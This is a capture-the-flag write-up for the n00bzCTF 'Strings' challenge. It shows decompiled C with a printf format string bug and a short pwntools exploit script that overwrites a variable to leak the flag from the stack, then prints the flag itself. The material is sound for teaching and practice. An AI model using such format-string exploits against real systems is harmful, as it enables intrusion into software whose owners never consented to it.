CTFtime.org / n00bzCTF / Strings / Writeup

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/297cb53c-fff0-4525-9f2c-dce146ffa433)

Disassembling with ghidra:

```c
void main(EVP_PKEY_CTX *param_1)

{
long in_FS_OFFSET;
char input [104];
init(param_1);
puts("Do you love strings? ");
fgets(input,100,stdin);
printf(input);
main2();
return;
}

void main2(void)

{
FILE *flag_stream;
long in_FS_OFFSET;
char real_flag [40];

flag_stream = fopen("flag.txt","r");
fgets(real_flag,40,flag_stream);
printf(fake_flag);
return;
}
```

There is a printf format string bug at `fgets(input,100,stdin); printf(input);` in main. In main2, the real_flag is loaded into stack and `printf(fake_flag);` is done. If the fake_flag could be overwritten with `%s`, it could print out
the first item in stack which is the real_flag. So using the fsb in main, overwrite the fake_flag with `%s`. But first need to get the offset of the fsb.

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/6afff690-023f-44e5-b6ac-9f6ccfc1ed4e)

The offset is at 6. Using the pwntools fsb exploit builder is my exploit script:

```py
from pwn import *

elf = context.binary = ELF('strings')

r = remote("challs.n00bzunit3d.xyz", 7150)

offset = 6

r.sendline(fmtstr_payload(offset, {elf.symbols.fake_flag:b"%s"}))
r.recv()

print(r.recv())
```

![image](https://github.com/jeromepalayoor/ctf-writeups/assets/63996033/fdc551c6-5807-4fee-a6f4-0993ccc49cc2)

Flag: `n00bz{f0rm4t_5tr1ng5_4r3_th3_b3s7!!!!!}`

Original writeup (https://jp-ch.gq/pwn/n00bzCTF-2023.html#strings).

Strings

Comments

Sign in with